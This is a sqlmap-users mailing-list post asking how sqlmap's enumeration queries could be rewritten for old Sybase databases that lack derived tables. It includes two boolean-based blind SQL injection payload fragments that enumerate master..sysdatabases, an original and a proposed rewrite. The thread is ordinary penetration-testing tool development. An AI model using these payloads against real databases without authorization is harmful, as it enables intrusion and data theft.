Hello,
Recently I've run into an issue with sqlmap and a pre-12.5.1 Sybase DB. It
seems pre-12.5.1 Sybase DBs do not support derived tables (e.g., SELECT *
FROM (SELECT example from table) as name). sqlmap uses these when
enumerating the table so it quickly runs into syntax errors. The feature
announcement for derived tables in 12.5.1 is below:
http://manuals.sybase.com/onlinebooks/group-as/asg1251e/whatsnew/@ebt-link;pt=584?target=%25N%14_1010_START_RESTART_N%25
I took a quick look and some of the basic queries can be rewritten, e.g.:
AND ASCII(SUBSTRING((SELECT
ISNULL(CONVERT(NVARCHAR(4000),COUNT(*)),CHAR(32)) FROM (SELECT DISTINCT
mmlP.name FROM (SELECT name FROM master..sysdatabases) AS mmlP) AS
value_table),3,1)) > 1
to
AND ASCII(SUBSTRING((SELECT ISNULL(CONVERT(NVARCHAR(4000),(SELECT
COUNT(DISTINCT name) FROM master..sysdatabases)),CHAR(32)) ),3,1)) > 1
However I'm unclear if this would work in all cases (and if so, how it
could be done cleanly.) Thoughts?
Brian
------------------------------------------------------------------------------
Keep Your Developer Skills Current with LearnDevNow!
The most comprehensive online learning library for Microsoft developers
is just $99.99! Visual Studio, SharePoint, SQL - plus HTML5, CSS3, MVC3,
Metro Style Apps, more. Free future releases when you subscribe now!
http://p.sf.net/sfu/learndevnow-d2d
_______________________________________________
sqlmap-users mailing list
sqlmap-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/sqlmap-users
